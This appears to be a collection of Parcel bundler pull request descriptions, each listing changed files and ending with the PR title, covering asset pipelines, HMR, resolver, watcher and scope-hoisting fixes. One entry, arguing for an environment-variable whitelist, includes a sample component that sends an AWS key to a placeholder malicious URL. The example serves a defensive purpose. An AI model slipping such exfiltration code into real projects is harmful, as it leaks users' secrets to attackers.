src/Asset.js, src/Pipeline.js, src/assets/CSSAsset.js, src/assets/CoffeeScriptAsset.js, src/assets/HTMLAsset.js, src/assets/JSAsset.js, src/assets/LESSAsset.js, src/assets/ReasonAsset.js, src/assets/SASSAsset.js, src/assets/StylusAsset.js, src/assets/TypeScriptAsset.js, src/assets/WebManifestAsset.js, src/worker.js
Rather than asset type classes extending one another, Parcel now takes care of composing asset types together. The output returned by an asset type's `generate` method is now recursively processed. This means, for example, that the `TypeScriptAsset` just returns JavaScript from its generate method and Parcel will automatically pass this to the `JSAsset` for further processing.
The API for `generate` changed slightly, but remains backward compatible. Now, instead of using object keys to return multiple renditions from an asset, an array is returned. This allows more options to be specified along with the actual value.
```javascript
generate() {
return [{
type: 'css',
value: ...
}, {
type: 'js',
value: ...
}];
}
```
There are a couple options that allow some control over how the composition …
=> Implement pipelines to compose multiple asset types together

src/HMRServer.js
Hey 👋 
Normally, when the bundler is stopped the HTTP server for HMR keeps on running. This PR closes it down when `bundler.stop()` is called.
We don't see it in our tests ([see here](https://github.com/parcel-bundler/parcel/blob/master/test/hmr.js)) because in our tests we use port 0, which causes Node to look for an available port. But we still have multiple servers open until Mocha closes them eventually by closing the entire process when it's finished.
=> close HMR server when HMRServer.stop() is called

src/builtins/hmr-runtime.js, test/hmr.js, test/utils.js
Fixes #413
Worked as a team with @sibartlett and @narsaynorath
=> Add overlay for build errors when using hmr

src/builtins/bundle-loader.js
I was running into problems using code splitting, and eventually discovered it was because of a bug in LazyPromise.
If you have code like this:
```
const foo = import('./foo')
foo.then(() => console.log('1'))
foo.then(() => console.log('2'))
```
Then I would expect the the file would log both `'1'` and `'2'`. Before this fix, it logs only '`1`', because if the promise executor has already been invoked, then `LazyPromise.prototype.then` is a no-op, just returning the existing promise.
The fix is to always invoke the appropriate callback, even if the promise has already been executed.
I ran into this issue when doing code splitting because I wanted to eagerly, but asynchronously load a dependency, and then use it later. I suspect this problem will also occur in any situation where a dynamic …
=> Fix methods of LazyPromise

src/builtins/loaders/node/js-loader.js, test/utils.js
The test `should load a wasm file in parallel with a dynamic JS import` was failing randomly since #981 was merged, this fixes it.
Combined with #1068 the tests should be reliable again.
=> Wait for the next event loop iteration when loading WASM

test/javascript.js
I just saw, that I forgot to use the projectBasePath for the second test case. Sorry. 🙈
=> Fix browserlist test not using the projectBasePath

test/integration/autoinstall/npm/package.json, test/integration/autoinstall/yarn/package.json, test/integration/babel-default/package.json, test/integration/babel-node-modules/package.json, test/integration/babel-polyfill/package.json, test/integration/jsx-hyperapp/package.json, test/integration/jsx-nervjs/package.json, test/integration/jsx-preact/package.json, test/integration/jsx-react/package.json, test/integration/plugins/package.json, test/integration/resolver/package.json
Reduces amount of warnings during tests.
=> Add “private: true” to package.json files in tests.

src/Bundler.js, src/packagers/JSPackager.js
Follow up to #981 based on [@devongovett comment](https://github.com/parcel-bundler/parcel/pull/981#discussion_r177645431) :
> would be cool to add support for registering bundle loaders for specific environments. this would allow third party plugins to do the same:
>
>```javascript
> bundler.addBundleLoader('wasm', {
>  node: require.resolve('./node/wasm-loader'),
>  browser: require.resolve('./browser/wasm-loader')
>});
>```
=> Update addBundleLoader to accept multiple targets

src/Server.js, test/server.js
If query params containing a dot character were on a request to `/`, they would get treated as the file extension. This parses the pathname from the requested URL and matches the extname against that instead. Fixes #1164.
=> Fix serving files with query params

src/assets/StylusAsset.js
Stylus's base case expects a `.styl` file. If a folder has two or more files with the same name, but different extensions, any `styl` file should take precedence for the sake of resolution. This sorts `styl` to the top of the list so that it is checked first. 
Closes #1110
=> Give priority to styl files in StylusAsset resolver

README.md
The appveyor badge before showed the status of the latest build (of a PR), this PR updates it to the master branch.
Better indicating the stability of the master branch
=> Change appveyor badge to master branch

src/utils/getTargetEngines.js
Don’t use “last 2 versions”. See https://jamie.build/last-2-versions. 
I think this should be an ok default query, see http://browserl.ist/?q=%3E0.25%25. I don't think we should drop IE 11 by default yet though, so this still means we are always running all plugins in babel-preset-env. A query like `> 0.5%, not ie 11, not android 4.4` would reduce that from 24 to 9 plugins... hmm. Thoughts?
cc. @jamiebuilds
=> Update default engines to > 0.25%

.eslintrc.json, src/Bundler.js, src/builtins/prelude.js, src/cli.js, src/packagers/JSPackager.js, test/integration/entry-point/index.js, test/integration/entry-point/test.html, test/javascript.js
The way the code is bundled is perfect for the browser. It is also perfect for Node.js if you want to do server-side rendering. However, it was impossible to expose functions that you could import from Node.js by requiring the bundle. The expected behaviour would be to access the entry point exports. Here is an example of what I was trying to accomplish:
test.js
```js
module.exports = function test(req) {
req.send();
};
```
index.js
```js
const req = {
send() {
console.log('MEOW!');
}
};
const test = require('./dist/test');
test(req);
```
- Step 1: bundling: `parcel build test.js`
- Step 2: run `node index`
The expected behaviour would be to have printed on the console `MEOW!`. Right now, it would throw `test is undefined`.
There is many benefits of working this way when you do …
=> Expose entry points exports

src/Resolver.js, src/transforms/babel.js, src/utils/fs.js, test/integration/babel-node-modules-source-unlinked/.eslintrc.json, test/integration/babel-node-modules-source-unlinked/index.js, test/integration/babel-node-modules-source-unlinked/node_modules/foo/index.js, test/integration/babel-node-modules-source-unlinked/node_modules/foo/package.json, test/integration/babel-node-modules-source-unlinked/package.json, test/integration/babel-node-modules-source/.eslintrc.json, test/integration/babel-node-modules-source/index.js, test/integration/babel-node-modules-source/node_modules/foo, test/integration/babel-node-modules-source/package.json, test/integration/babel-node-modules-source/packages/foo/index.js, test/integration/babel-node-modules-source/packages/foo/package.json, test/integration/resolver/node_modules/package-alias-glob/package.json, test/integration/resolver/node_modules/source, test/integration/resolver/node_modules/source-alias, test/integration/resolver/node_modules/source-alias-glob, test/integration/resolver/node_modules/source-not-symlinked/package.json, test/integration/resolver/packages/source-alias-glob/package.json, test/integration/resolver/packages/source-alias/package.json, test/integration/resolver/packages/source/package.json, test/javascript.js, test/resolver.js
Related issues: #13, #948 
When developing several modules locally, it is useful to symlink them into your project with `npm link` or similar.  This is also common with monorepos managed by yarn workspaces and lerna. If those linked modules need to be compiled with babel, it is annoying to have to run a manual build step after each change since Parcel does not run babel on node_modules by default.
This PR adds support for a new `source` field to package.json. When a module with a `source` field is symlinked, we enable babel compilation on that module. If the module is not symlinked but installed normally, babel compilation is disabled as usual. This is a development only feature, and should not be relied on for production use.
The `source` field also operates as an alias so you can change …
=> [RFC] Support source field in package.json to enable babel on symlinked modules

src/assets/LESSAsset.js, src/assets/SASSAsset.js, src/transforms/postcss.js, src/transforms/posthtml.js
Bugfix
All tests are passing
We will get an error config if we loading config multiple times from `package.json`, because the config is passed by reference.
For example, we use `postcss` and add a `postcss` field into `package.json` like this:
```json
...
"postcss": {
"plugins": {
"autoprefixer": {
"grid": true
}
}
}
...
```
Then the first time in [`./src/transforms/postcss.js:L34`](https://github.com/parcel-bundler/parcel/blob/master/src/transforms/postcss.js#L34) we can get a correct config like above.
But if we change some styles, in the second time we will get an error config like this:
```json
"postcss": {
"plugins": [null, null, null],
"from": "...",
"to": "..."
}
```
All `plugins` will missing because it has been overwritten in …
=> Fix reference pass error in package config

src/builtins/hmr-runtime.js, src/builtins/prelude.js, src/packagers/JSPackager.js, src/visitors/globals.js, test/integration/global-redeclare/index.js, test/integration/global-redeclare/package.json, test/javascript.js
Picks up on work done by @mBeierl (closes #353).
Fixes #335.
=> Remove `eval` usage. Fixes CSP cases.

src/Bundler.js, src/Watcher.js
This prevents EMFILE errors on large projects caused by running out of file descriptors.
=> Watch directories instead of individual files

src/Bundle.js
suggestion for a fix
thx for this awesome tool and keep up the good work 😄 
Closes #1228
=> fix for outFile option; respect file-extension (#1228)

src/assets/JSAsset.js, src/visitors/globals.js, test/integration/define-amd/index.js, test/javascript.js
Some UMD modules like moment-timezone have their AMD check before the CommonJS one. When an AMD loader like RequireJS is on the page, this causes the module to call `define` instead of exposing the exports to Parcel via CommonJS.
This PR sets `define` to `undefined` inside modules so that the AMD check will not pass and the exports will be exposed to CommonJS instead.
=> Fix loading modules with AMD defines

src/Resolver.js, test/integration/resolve-entries/browser-multiple.js, test/integration/resolve-entries/pkg-browser-multiple/browser-entry.js, test/integration/resolve-entries/pkg-browser-multiple/package.json, test/javascript.js
Fixes #1283. Libraries with a self-referencing `browser` object are incorrectly resolved.
- [`when@3.7.8`](https://unpkg.com/when@3.7.8/package.json)
```json
{
"browser": {
"when": "./dist/browser/when.js",
"vertx": false
}
}
```
=> Fix browser entry-point resolution

src/Asset.js, src/Bundler.js, src/Parser.js, src/Pipeline.js, src/assets/CSSAsset.js, src/assets/CoffeeScriptAsset.js, src/assets/GLSLAsset.js, src/assets/GlobAsset.js, src/assets/GraphqlAsset.js, src/assets/HTMLAsset.js, src/assets/JSAsset.js, src/assets/JSONAsset.js, src/assets/LESSAsset.js, src/assets/PugAsset.js, src/assets/ReasonAsset.js, src/assets/RustAsset.js, src/assets/SASSAsset.js, src/assets/StylusAsset.js, src/assets/TOMLAsset.js, src/assets/TypeScriptAsset.js, src/assets/VueAsset.js, src/assets/WebManifestAsset.js, src/assets/YAMLAsset.js, src/transforms/babel.js, src/transforms/htmlnano.js, src/transforms/postcss.js, src/transforms/posthtml.js, src/visitors/fs.js, src/worker.js, test/asset.js
Previously, we would get the package.json from the resolver and pass it over the IPC to workers for use in assets along with the full bundler options object. These were fairly large objects, so passing them across the wire every time was slow.
We now no longer pass those things over the IPC. The package.json object is resolved as needed within the asset using the `getPackage` method. Additionally a `packageKey` option was added to the `getConfig` method. The options object is already passed to all of the workers during initialization, so doesn't need to be passed for every asset.
=> Don’t pass package.json and options over IPC

src/Bundler.js, test/integration/dynamic-hoist-dup/a.js, test/integration/dynamic-hoist-dup/common.js, test/integration/dynamic-hoist-dup/index.js, test/javascript.js
Previously if an asset was already in the common bundle, it would get duplicated in a child because of some faulty logic. Now it will no longer be duplicated in the child. Related to #885.
=> Fix bundle hoisting when asset is already in the common bundle

src/assets/JSAsset.js, test/javascript.js
This fix checks if target is browser before replacing process.env with the value of the environment variable. 
When targeting node parcel should not replace process.env with value of variable in code at bundle time. Node needs to do this at runtime.
I've assumed that electron is the same way but haven't built any electron apps myself yet so.. not sure. If my assumption was incorrect the pull request needs a little tweak.
=> Bug fix. Only resolve env vars on bundling when --target=browser.

src/Asset.js, src/Bundle.js, src/Bundler.js
Previously the bundleTime, was all asset's build times totalled. This indicator was incorrect as we use workers and it might be misleading for performance benchmarking.
So I've changed it in this PR to a more accurate indicator, taking the first starting time of the assets and the last ending time of the assets of the bundle and differencing those and adding the time the packager takes.
This PR also changes the map build times to represent the actual mapping instead of also including asset build times
So this will change this output (Totals to 3.06minutes 🤯):
Into this output (Totals to 7.77seconds 🚀):
=> Improve reported bundle times

src/builtins/hmr-runtime.js
The console got cleared after the hmr updates ran, this PR changes it to before updates, so that updates output doesn't get removed instantly
Close #1365
=> Clear console before hmr updates

src/packagers/RawPackager.js
When an `Asset` generates multiple assets with different types, `RawPackager` would give the same output for every entry in `asset.generated` even if they have different types and values.  This is because it used the asset's primary type `asset.type` instead of the type for the bundle it is actually generating (`this.bundle.type`).
This fixes it so that `RawPackager` uses the bundle type so that the correct entry in `generated` is read for each bundle.
=> Lookup correct generated output for bundle type in RawPackager

src/assets/VueAsset.js
This PR is intended to fix #1350 and probably also #1344.
Without this fix, the user's code is minified just fine; however, supplemental code is minified separately, then appended to the user's code in the same scope. This can cause a symbol naming clash which breaks the user's code.
=> Fix Vue asset supplemental code concatenation

src/transforms/posthtml.js, test/html.js
fixes #488 
closes #1226
:rotating_light: note: works with config like this:
https://github.com/parcel-bundler/parcel/blob/e7df99decb2484d08b4f613ec6dc2ebe4bf9e969/test/integration/posthtml-assets/.posthtmlrc.js#L1-L7
not like this:
https://github.com/parcel-bundler/parcel/blob/e7df99decb2484d08b4f613ec6dc2ebe4bf9e969/test/integration/posthtml/.posthtmlrc.js#L1-L7
=> add dependencies referenced by posthtml-include

src/assets/SASSAsset.js, test/integration/sass-advanced-import/bar.sass, test/integration/sass-advanced-import/foo.sass, test/integration/sass-advanced-import/hello.sass, test/integration/sass-advanced-import/index.sass, test/integration/scss-import/bar.scss, test/integration/scss-import/base.scss, test/integration/scss-import/foo.scss, test/integration/scss-import/index.scss, test/sass.js
I'm not sure if this is a good idea, but I guess this has sort of become the standard in css imports?
This PR changes import syntax for sass:
Node modules:
`~some-node-module/...`
Files:
`some-file` or `./some-file`
Parcel's custom resolver:
`~/some-file` or `/some-file`
Closes #1329 Closes #1402
=> support for sass specific import syntax

src/Asset.js, test/asset.js
Fix addURLDependency resolution in Asset.js
Minimal reproducible repo: https://github.com/marcosbozzani/parcel-bug-tilde-abs-paths
Just clone the repo, `yarn install` and `yarn tilde` or `yarn slash`
Tilde error: `Cannot resolve dependency './~\style.css'`
Slash error: `Cannot resolve dependency './..\..\..\..\..\..\`
=> Fix absolute and tilde paths

test/html.js
Fixes a failing appveyor html test
=> Fix failing appveyor test

src/assets/GlobAsset.js, src/utils/localRequire.js
- Use the async version of `glob` in `GlobAsset`
- Use the async version of `resolve` in `localRequire`
=> Use async modules when possibles

src/Bundler.js
Plugins should be able to run code before a build process starts.
=> Adding an bundlestart event

src/Logger.js, src/worker.js, src/workerfarm/WorkerFarm.js, src/workerfarm/child.js
This PR fixes a bug with the workerfarm, related to the workers not properly setting the env variable `PARCEL_WORKER_TYPE`
=> Fix worker environment variable

test/lineCounter.js
I'm curious if not using `require('os').EOL` for splitting lines in lineCounter is problematic or not. Since I don't have a Windows machine I'm testing this in your CI! :D
=> Add unit tests for line counter

src/assets/HTMLAsset.js, src/transforms/posthtml.js
This pull request makes HTML parsing options configurable, so HTMLAsset parsing / transform behavior can be more consistent.
With this change we can config `.posthtmlrc` with the following options (they are consumed by posthtml-parse, then htmlparser2. See also https://github.com/fb55/htmlparser2/wiki/Parser-options )
- `xmlMode: true`
- `lowerCaseAttributeNames: false`
- `lowerCaseTags: false`
- `recognizeSelfClosing: true`
- ...
If we config `recognizeSelfClosing: true` in `.posthtmlrc`,  we can also fix #1103 
Allow setting `false` to lower case options maybe can also fix #1123 . (not tested yet)
=> Pass .posthtmlrc options to posthtml-parse

src/transforms/uglify.js
Fix a typo that prevented source maps from being carried over when minifying.
Would be awesome to get this out in a `1.8.2` release.
=> Fix typo in uglify.js (fixes #1353)

src/assets/RustAsset.js, test/integration/rust-cargo-workspace/.eslintrc, test/integration/rust-cargo-workspace/Cargo.toml, test/integration/rust-cargo-workspace/member/Cargo.toml, test/integration/rust-cargo-workspace/member/src/index.js, test/integration/rust-cargo-workspace/member/src/lib.rs, test/rust.js
Without the PR Parcel tries to infer the output directory for a cargo build in a less flexible way. However, since the project structure of Cargo projects that make use of workspaces feature is slightly different from the normal one, that fails.
This PR uses the `cargo metadata` command to infer the correct target directory, which is should be fairly robust.
=> Add support for Cargo workspaces in Rust integration

package.json, src/Asset.js, yarn.lock
I figured out #927.
Babel seems to mutate config. More specifically, presets seem to append plugins every time babel is run. Because the asset caches `asset.package`, when using a package config like `asset.package.babel`, babel mutates the cached package config. Next time it needs the config it gets the same config, and mutates it again.
Instead, if loading config using a packageKey, clone the config before returning so mutations won't be persisted on the cached copy.
=> Fix babel config in package.json

package.json, src/Bundler.js, src/Server.js, test/integration/bundler-error-syntax-error/index.html, test/integration/bundler-error-syntax-error/index.js, test/server.js, yarn.lock
Instead of sending a generic error with the 500 response, print the error message and stack trace in the response HTML payload. 
Feel free to comment.
=> Surface Bundler error to browser

src/Bundler.js
Whitelisting is important to avoid accidentally leaking potentially sensitive information to the bundle. Imagine a React component published to npm that looked like:
```javascript
export default () => {
<script dangerouslySetInnerHTML={{__html: `
var img = new Image();
img.src = 'https://malicious-url/?aws-key=${process.env.AWS_KEY}';
` }} />
}
```
Now, when programatically bundling, it possible to avoid this issue:
```javascript
const Bundler = require('parcel-bundler');
new Bundler(entry, {
env: {
foo: 'bar',
// YAY - no AWS secret leaked!
}
});
```
To retain the old behaviour while mixing in new variables could be achieved with:
```javascript
const Bundler = require('parcel-bundler');
new Bundler(entry, {
env: {
...process.env,
foo: 'bar',
// YAY - no AWS secret leaked!
}
});
```
=> Programatically pass env vars as a whitelist

src/assets/LESSAsset.js, src/assets/SASSAsset.js, src/utils/parseCSSImport.js, test/integration/less-import/base.less, test/integration/less-import/node_modules/external-less/a.less, test/integration/less-import/node_modules/external-less/package.json
This fixes relative paths being seen as a node_module, works identical to how sass gets processed.
Closes #1541
=> LESS: Fix relative paths and node module conflict 

src/assets/VueAsset.js
This PR fixes the first line of supplemental code being [accidentally commented out](https://github.com/parcel-bundler/parcel/blob/v1.9.1/src/assets/VueAsset.js#L112) when the generated JS code (the `js` variable) was ended with `//`.
=> Fix unintended Vue asset supplemental code insertion

src/cli.js
Like others in #702, there are times when I need a development build. This change remedies that by using the `NODE_ENV` set by a user in the build command, but will default to `production` is none is provided.
=> Set user provided NODE_ENV if provided with build command

src/cli.js
=> add cache-dir option to cli

src/scope-hoisting/shake.js, test/integration/scope-hoisting/commonjs/export-local/a.js, test/integration/scope-hoisting/commonjs/export-local/b.js, test/scope-hoisting.js
Fixes #1549. Tiny refactor of the node removal part of the DCE to handle more wild cases and do the removal recursively on parents.
Did this before going to work, will update later to fix/add tests.
Feedback appreciated, fixes `keycode` and `material-ui` (build, didn't had time to runtime test, cc @oliviertassinari).
It breaks DCE on babel-minify but not on Uglify.
=> Fix tree-shaking DCE

package.json, yarn.lock
This pull request upgrades the default version of Typescript from 2.7 to 2.9
=> Upgrade Typescript to 2.9

src/utils/getTargetEngines.js
=> Upgrade DEFAULT_ENGINES node to Node 8

src/assets/SASSAsset.js
For #1613 
I have reviewed the contributing guidelines and glad to give a pr to fix it.
Hope this is a suitable solution.
=> Fix Sass dependencies can not be watched when includePaths is a relative path

src/Bundler.js
This PR adds a buildError event to the bundler, which is very usefull, when using the parcel API
=> Add a buildError event to bundler

src/Bundle.js, src/packagers/JSConcatPackager.js
=> Fix sourcemap file size in report

CONTRIBUTING.md, src/workerfarm/WorkerFarm.js
I had an issue with Parcel freezing during bundling.
@DeMoorJasper was so kind to help debugging the issue.
Turns out lowering the amount of concurrent calls per worker solves my issue.
This PR let users set that value with an env variable.
Thanks
=> Use PARCEL_MAX_CONCURRENT_CALLS environment variable

src/cli.js
When NODE_ENV is set to something else instead of `production` build was
not exiting. This bug was introduced in 1b6a93f3efa1d8a4e9e04beda1a5545770e9fb07
Closes #1626
=> fix build not exiting in dev env

src/transforms/postcss.js, src/transforms/posthtml.js, src/utils/config.js, test/css.js, test/integration/postcss-plugins/.postcssrc.js, test/integration/postcss-plugins/index.css, test/integration/postcss-plugins/index.js, test/integration/postcss-plugins/index2.js
When the postcss config object is being copied with `Object.assign`, the nested `plugins` array or object remains as a reference and not a copy.
As the postcss transform deletes the plugins config for `postcss-modules` each time, it inadvertently deletes the original config by reference.
As a result, postcss transforms that occur after the first time have no `postcss-modules` plugins config and therefore parcel produces a different result for all subsequent transforms.
Related: #809
=> Prevent postcss-modules plugin config from being deleted after first run

src/packagers/JSPackager.js, test/integration/js-different-contents/hello.js, test/integration/js-different-contents/index.js, test/integration/js-different-contents/world.js, test/integration/js-same-contents-different-dependencies/hello/index.js, test/integration/js-same-contents-different-dependencies/hello/value.js, test/integration/js-same-contents-different-dependencies/index.js, test/integration/js-same-contents-different-dependencies/world/index.js, test/integration/js-same-contents-different-dependencies/world/value.js, test/integration/js-same-contents-same-dependencies/hello1.js, test/integration/js-same-contents-same-dependencies/hello2.js, test/integration/js-same-contents-same-dependencies/index.js, test/javascript.js
=> fixes #933 : JSPackager deduplication now accounts for differences in absolute dependency paths

src/Bundle.js, src/Bundler.js, src/visitors/dependencies.js, test/integration/workers/common.js, test/integration/workers/feature.js, test/integration/workers/index-alternative.js, test/integration/workers/worker-client.js, test/integration/workers/worker.js, test/javascript.js
This is a branched of PR from #979 
Main difference is that this PR adds options to the bundle that sets bundle.isolated, instead of looping through all dependencies every time you add a new one. (Should be slightly faster and more straightforward)
All credit goes to @dhcode for this, just wanted to bring some new life into this issue.
Closes #979
=> Fix worker bundle hoisting

src/Resolver.js
It's what webpack does - [link](https://webpack.js.org/configuration/resolve/#resolve-mainfields).
IMHO it's really important to be consistent about this across bundlers, because otherwise the library authoring process is unclear and impossible to satisfy all bundlers with a single `package.json` description.
It also only make sense to use *more* specific field (`"browser"`) with higher priority than less specific one (`"module"`). Latter only recommends using ESM modules over CJS, former doesn't actually say anything about module format but it's way more specific about targeting environment and this can be leveraged to produce more optimized bundles.
Keep in mind that `"browser"` is also an alias field and can be used like this:
```json
{
"main": "dist/module.cjs.node.js",
"module": …
```
=> Prioritize browser field over module

src/Watcher.js
Fixes #1557.
Closes #1559.
We switched to watching directories instead of files in #1279 because of EMFILE errors (running out of file descriptors) when watching individual files. This was especially seen on macOS. However, it seems that watching directories is not supported on Linux, so Chokidar is recursively watching all individual files in node_modules. This is likely more files than just the ones we were watching individually before, since it will include things in node_modules that aren't in the build (e.g. tests, etc.).
This PR changes the behavior of the watcher to only watch directories on macOS, where Chokidar has special support via fs-events. Long term, we should consider moving off of Chokidar but this should "solve" the problem temporarily.
=> Only watch directories on macOS

src/transforms/postcss.js
Alternative to #1395, use local installation of `cssnano`.
Closes #1395.
Fixes #645.
=> Use user installation of `cssnano`

package.json, src/Bundler.js, src/Logger.js, src/utils/installPackage.js, src/workerfarm/WorkerFarm.js, test/logger.js, yarn.lock
This PR adds a spinner using `ora`, this replaces the status code.
As this is already battletested it should fix some issues we've been seeing with status.
This PR also changes error logging to log the message using console.log instead of status
This also fixes a bug in lineCounter, as it wasn't being ansiStripped, which caused incorrect lineCounts (mainly for error Stacks)
Closes #923 Closes #349 Closes #1293
=> Minor logger improvement and a bugfix

package.json, src/assets/HTMLAsset.js, src/transforms/posthtml.js, test/html.js, test/integration/posthtml-plugin-deps/base.html, test/integration/posthtml-plugin-deps/index.html, test/integration/posthtml-plugin-deps/posthtml.config.js, yarn.lock
Fixes #1670
I didn't find much about `tree.messages`, it is in [`posthtml` tests](https://github.com/posthtml/posthtml/blob/788a306b33b6930b9bbfbcb659484e75cf3ee940/test/messages.js).
Also found in `posthtml-include` :
https://github.com/posthtml/posthtml-include/blob/e4f2a57c2e52ff721eed747b65eddf7d7a1451e3/index.js#L18-L26
=> Watch PostHTML plugins dependencies

.travis.yml, appveyor.yml
Do we want to add node version 10 support?
=> adding support for node 10?

src/FSCache.js, src/utils/glob.js, test/fs-cache.js
Duplicate of #1414 
This is needed to properly invalidate and cache styl files as they allow glob requires.
But I kind of messed up a rebase, so here is a clean version
Closes #1546
=> Handle invalidating cache if dependency is a globAsset

src/scope-hoisting/concat.js, src/scope-hoisting/hoist.js, test/integration/scope-hoisting/es6/import-wrapped/a.js, test/integration/scope-hoisting/es6/import-wrapped/b.js, test/scope-hoisting.js
Fixes de-optimized modules like `redux-bundler`
=> Fix tree-shaking named import on wrapped module

src/packagers/JSConcatPackager.js
I found JSConcatPackager use minify file when `option.minify = false`
=> Use minify prelude only minify option

src/Asset.js, src/Bundler.js, src/Pipeline.js, src/builtins/hmr-runtime.js, src/packagers/JSConcatPackager.js, src/packagers/JSPackager.js, src/scope-hoisting/concat.js, src/scope-hoisting/hoist.js, src/scope-hoisting/shake.js, src/scope-hoisting/utils.js, src/utils/md5.js, src/worker.js
Closes #780. Fixes #735. Fixes #1656.
Before this change, asset ids were integers that were dependent on resolution order. There were two problems with this:
1. Builds were not deterministic (#735). This meant that if you did two builds without changing any files, the output might be different, since the asset ids might change. This is not great for long-term cachability, build verification, etc.
2. Since scope hoisting was merged, we started depending on the asset ids as part of variable identifiers. We started caching these asset ids so that references between modules were kept the same if you rebuilt from cache. The problem with caching asset ids is that if you actually changed a file and it was invalidated in the cache, a new asset id was generated. Then, references using the old ids …
=> Deterministic asset ids

CONTRIBUTING.md
Changed debugging recommendation for `PARCEL_WORKERS` from `PARCEL_WORKERS=0` to `PARCEL_WORKERS=1` as `PARCEL_WORKERS=1` will force parcel to use the local worker in the main thread exclusively.
=> Correction in CONTRIBUTING.md for PARCEL_WORKERS

src/scope-hoisting/concat.js, src/scope-hoisting/hoist.js, src/scope-hoisting/shake.js, test/integration/scope-hoisting/es6/name-clash/a.js, test/integration/scope-hoisting/es6/name-clash/b.js, test/scope-hoisting.js
Fixes #1699
Found in [`core-js` code](https://cdn.jsdelivr.net/npm/core-js/modules/_wks.js) 
```js
var $exports = module.exports = function (name) {
return store[name] || (store[name] =
USE_SYMBOL && Symbol[name] || (USE_SYMBOL ? Symbol : uid)('Symbol.' + name));
};
$exports.store = store;
```
=> Prevent nameclashes with internal variables

src/workerfarm/errorUtils.js
=> Fix error logging when thrown errors are strings

src/Asset.js, src/packagers/JSConcatPackager.js, src/scope-hoisting/hoist.js, test/graphql.js, test/integration/scope-hoisting/es6/side-effects-array/a.js, test/integration/scope-hoisting/es6/side-effects-array/node_modules/bar/bar.js, test/integration/scope-hoisting/es6/side-effects-array/node_modules/bar/foo.js, test/integration/scope-hoisting/es6/side-effects-array/node_modules/bar/index.js, test/integration/scope-hoisting/es6/side-effects-array/node_modules/bar/package.json, test/scope-hoisting.js
This pull request implements array support for the `package.json`'s `sideEffects` property, like webpack does. Example:
```json
"sideEffects": ["./a.js"]
```
Fixes #1566.
=> Support array in package.json's sideEffects property

src/Resolver.js, src/utils/fs.js, test/integration/resolver/node_modules/package-module-fallback/package.json, test/resolver.js
Sometimes a package has in his package.json a source field, but the package is already bundled/compiled, so there isn't any source file inside that package. Now, before returning any package file, parcel checks if the file exists. If it doesn't exists, parcel tries to use another file, until a real file is found. fixes #1568 
I still need to fix the error...
=> get only existing package main

src/SourceMap.js
Sourcemaps inside assets were being overwritten due to not cloning the actual mappings array before merging and manipulating them inside the packager. Which caused the sourcemaps to get their position + bundle offset, resulting in incorrect mappings
Closes #997
=> Fix sourcemaps failing on refresh

src/FSCache.js
Splits cache dir structure into subdirectories for slightly faster fs if there are a lot of cache files
=> Split cache into subdirs for faster fs

CONTRIBUTING.md
Now that Parcel is using Spectrum instead of Slack for community management, I figured we should update `CONTRIBUTING.md` accordingly.
Happy to make any language changes you feel are necessary!
=> Replace Slack instructions with Spectrum instructions

src/Server.js
While developing my first Parcel project I noticed that html5 history urls/routes were not working when reloading the page or changing the url manually. This is due to a default setting in `serve-static` which redirects directory urls to `/`. I made this simple change to my locally installed parcel-bundler and all works as expected 🎉
=> Support html5 history mode routing

src/utils/generateCertificate.js
Fixes browser errors thrown due to multiple certificates using the same issuer and serial number.  Occurs when a self-signed certificate has already been stored in the browser and new certificate is generated; either in the same project or across project installations.
=> generate unique certificate serial numbers

package.json, yarn.lock
Update to typescript 3.0.0, it's just so the tests run the latest version.
There appears to be no breaking changes.
=> Typescript 3.0.0 update

src/cli.js
Just a small documentation change -- as of #1040, the default value for `--public-url` is `/`, not the `--out-dir` option anymore.
=> Update help message for public-url option

src/assets/StylusAsset.js, test/integration/stylus-glob-import/index.js, test/integration/stylus-glob-import/index.styl, test/integration/stylus-glob-import/subdir/bar/bar.styl, test/integration/stylus-glob-import/subdir/foo/foo.styl, test/integration/stylus-glob-import/subdir/main.styl, test/stylus.js
As said in #1816, Parcel currently overrides the Stylus resolver with its own, namely to support importing from `node_modules` and root imports. However, it currently fails to resolve glob imports, trying to resolve to files literally named `**/*` (which obviously don't exist, throwing `ENOENT`).
This PR works around the issue by detecting glob imports in the ahead-of-time Stylus `ImportVisitor`, applying `fast-glob` on the given path, and then associating multiple paths to the import instead of a single one.
During evaluation time, it will then replace the glob import statement with multiple ones (one for each resolved file) before passing them to Stylus, and then merging all the resulting node blocks into one.
This PR also adds a test case for Stylus glob import, to prevent future …
=> Fix glob import/require in Stylus assets

package.json, src/assets/JSAsset.js, src/transforms/babel.js, test/integration/object-rest-spread/object-rest-spread.js, test/javascript.js, yarn.lock
This uses Babel's plugin:
https://babeljs.io/docs/en/babel-plugin-transform-object-rest-spread
Spec:
https://tc39.github.io/ecma262/#sec-object-initializer-runtime-semantics-propertydefinitionevaluation
Fixes #1221, #1422
=> Enable Object Rest Spread by default

src/assets/GraphqlAsset.js, test/graphql.js, test/integration/graphql-import/another.graphql, test/integration/graphql-import/index.js, test/integration/graphql-import/local.graphql, test/integration/graphql-import/other.graphql
An alternative to #1817 that doesn't rely on using `graphql-tag/loader`, which is a Webpack loader.
1. Recursively traverse the GraphQL files.
2. Collect all the imports into a map.
3. Concatenate them.
4. Parse the result into an AST.
This PR (as of time of writing) does not have feature parity with `graphql-tag/loader`, meaning that:
* It does not de-duplicate fragments that have the same name. _This is a behavior that I personally disapprove of since it can lead to surprising results instead of throwing an error if a user accidentally (however unlikely) reuses an already defined fragment name._
* It does not collect multiple defined queries/mutations and make them individually require-able from a JavaScript parent.
If the above behaviours are desired then I can implement them.
=> Import GraphQL files from other GraphQL files (closes #1477)

src/Parser.js
This fixes the issue #1894. Now it compiles the CSS file containing the parsed version of the PostCSS code within Vue Components inline style tags. As well as working with the VSCode Vetur extension for the syntax highlighting.
=> Fix: VSCode syntax highlight with PostCSS in Vue Component style tag

src/transforms/postcss.js
This just throws a simple error if postCSS config is not an object.
Closes #749
=> Validate if PostCSS config is an object

src/assets/SASSAsset.js, test/integration/scss-url/index.scss, test/sass.js
This PR moves url resolving to PostCSS instead of relying on SASS to work.
Figured it might be worth it as it has been a pretty stale issue on the SASS end for a lil while now.
Closes #316
=> Remove sass url loader, move url resolving to PostCSS

src/Bundler.js, src/cli.js, test/utils.js
Print a user friendly error message if no entrypoint can be found.
Also prints a user friendly error if a user defined entrypoint has a resolve error
Closes #1797 Closes #1829
=> Print user friendly error if no entrypoint can be found

src/Bundler.js
As Parcel now supports single dev builds, it makes no sense to check for production env, changed the line to be checking if it's watching for changes. (It should have probably been like that all along)
=> Exit process on error if it's just a single build

src/visitors/env.js
